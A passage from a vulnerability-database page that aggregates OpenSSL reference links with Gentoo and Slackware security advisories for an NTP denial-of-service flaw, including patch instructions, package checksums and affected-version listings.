"http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1787" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0285" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0292" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0290" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0204" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0287" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.openssl.org/about/releasestrat.html)," }, { "trust": 0.1, "url": "https://www.openssl.org/about/secpolicy.html" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "http://www.hp.com/go/smh" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:06/openssl-1.0.1.patch.asc" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:06/openssl-0.9.8.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287\u003e" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:06.openssl.asc\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209\u003e" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:06/openssl-1.0.1.patch" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20150319.txt\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:06/openssl-0.9.8.patch.asc" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0209" }, { "db": "BID", "id": "73239" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131023" }, { "db": "PACKETSTORM", "id": "130916" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130932" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "NVD", "id": "CVE-2015-0209" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-0209" }, { "db": "BID", "id": "73239" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131023" }, { "db": "PACKETSTORM", "id": "130916" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130932" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "NVD", "id": "CVE-2015-0209" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-03-19T00:00:00", "db": "VULMON", "id": "CVE-2015-0209" }, { "date": "2015-03-19T00:00:00", "db": "BID", "id": "73239" }, { "date": "2015-03-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "date": "2015-08-26T01:33:25", "db": "PACKETSTORM", "id": "133318" }, { "date": "2015-03-25T15:48:03", "db": "PACKETSTORM", "id": "131023" }, { "date": "2015-03-20T04:45:06", "db": "PACKETSTORM", "id": "130916" }, { "date": "2015-03-20T05:46:26", "db": "PACKETSTORM", "id": "130933" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-07-21T13:37:51", "db": "PACKETSTORM", "id": "132763" }, { "date": "2015-03-20T05:41:10", "db": "PACKETSTORM", "id": "130932" }, { "date": "2015-04-22T20:14:53", "db": "PACKETSTORM", "id": "131585" }, { "date": "2015-03-19T22:59:02.617000", "db": "NVD", "id": "CVE-2015-0209" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2015-0209" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "73239" }, { "date": "2016-11-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "date": "2023-11-07T02:23:19.410000", "db": "NVD", "id": "CVE-2015-0209" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "73239" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/ec/ec_asn1.c of d2i_ECPrivateKey Service disruption in functions (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001879" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "73239" } ], "trust": 0.3 } }
var-201701-0398
Vulnerability from variot
NTP before 4.2.8p7 and 4.3.x before 4.3.92 allows remote attackers to cause a denial of service (prevent subsequent authentication) by leveraging knowledge of the controlkey or requestkey and sending a crafted packet to ntpd, which changes the value of trustedkey, controlkey, or requestkey. NOTE: this vulnerability exists because of a CVE-2016-2516 regression. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP There is a service disruption ( Interfering with subsequent authentication ) There are vulnerabilities that are put into a state. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable.
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Background
NTP contains software for the Network Time Protocol.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2016-120-01)
New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. This release patches several low and medium severity security issues: CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering CVE-2016-1549: Sybil vulnerability: ephemeral association attack, AKA: ntp-sybil - MITIGATION ONLY CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion botch CVE-2016-2517: Remote configuration trustedkey/requestkey values are not properly validated CVE-2016-2518: Crafted addpeer with hmode > 7 causes array wraparound with MATCH_ASSOC CVE-2016-2519: ctl_getitem() return value not always checked CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos CVE-2016-1548: Interleave-pivot - MITIGATION ONLY CVE-2015-7704: KoD fix: peer associations were broken by the fix for NtpBug2901, AKA: Symmetric active/passive mode is broken CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks CVE-2016-1550: Improve NTP security against buffer comparison timing attacks, authdecrypt-timing, AKA: authdecrypt-timing For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz
Slackware 13.1 package: dfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz
Slackware 13.37 package: e760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: aa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz
Slackware 14.1 package: dbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz
Slackware -current package: 4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz
Slackware x86_64 -current package: 7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iEYEARECAAYFAlcjyyAACgkQakRjwEAQIjPtSgCdEB0YxCNSAabWZwD+ICyXcqeg 3rIAnRLKXh7P6QXP2t+va4PM0crnd3l4 =VO7T -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0398", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.9, "vendor": "ntp", "version": "4.3.90" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.91" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.80" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.87" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.89" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.88" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.83" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.84" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.85" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.86" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.36" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.71" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.56" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.9" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.65" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.51" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.13" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.48" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.81" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.63" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.16" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.12" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.74" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.50" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.8" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.62" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.54" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.21" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.78" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.73" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.5" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.6" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.27" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.49" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.4" }, { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.46" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.22" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.14" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.82" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.1" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.3" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.75" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.34" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.67" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.11" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.32" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.41" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.31" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.52" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.18" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.33" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.2" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.44" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.45" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.59" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.39" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.64" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.57" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.43" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.20" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.24" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.23" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.53" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.7" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.55" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.35" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.10" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.38" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.40" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.42" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.69" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.60" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.79" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.66" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.72" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.26" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.61" }, { "model": "ntp", "scope": "eq", "trust": 1.0, 